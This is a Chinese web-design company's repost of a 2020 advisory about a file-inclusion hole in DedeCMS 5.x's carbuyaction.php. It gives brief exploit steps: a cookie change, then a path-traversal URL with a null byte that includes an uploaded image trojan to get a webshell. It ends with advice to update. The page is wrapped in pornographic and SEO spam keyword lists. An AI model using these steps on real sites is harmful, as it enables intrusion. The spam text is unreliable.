婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 網站建設 > 建站知識 > Dedecms中一個重大漏洞文件carbuyaction.php,請注意修

Dedecms中一個重大漏洞文件carbuyaction.php,請注意修

POST TIME:2020-04-10 16:45

使用過DEDECMS的人,可能很多都知道了這個漏洞,在DEDECMS5.X版本中,這個文件漏洞一直存在,文件如下: 漏洞文件carbuyaction.php

  1. 首先利用cookie修改工具,加上code=alipay然后訪問
  2. http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00
  3. 直接包含成功
  4. 利用條件為GPCOFF,或者某些環境下的截斷。
  5. 可以在會員中心里上傳個圖片木馬進行拿shell。
  6. 還可以包含dede自身文件進行更多利用,這里就不詳細了。

現在最新版的DEDECMS5.7已經修復了這個錯誤,如果是早起的版本DEDECMS請用最新版文件覆蓋即可



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
主站蜘蛛池模板: 安吉县| 藁城市| 婺源县| 札达县| 余江县| 浦东新区| 云阳县| 克山县| 崇信县| 黑水县| 彰化市| 水城县| 肥西县| 邵阳市| 庐江县| 那坡县| 宁国市| 黄山市| 托里县| 林甸县| 日喀则市| 班戈县| 天台县| 定安县| 元江| 晴隆县| 高尔夫| 全州县| 宁化县| 吉林市| 宁夏| 滕州市| 高青县| 合川市| 临朐县| 哈巴河县| 武夷山市| 疏勒县| 曲阳县| 荥阳市| 桃园县|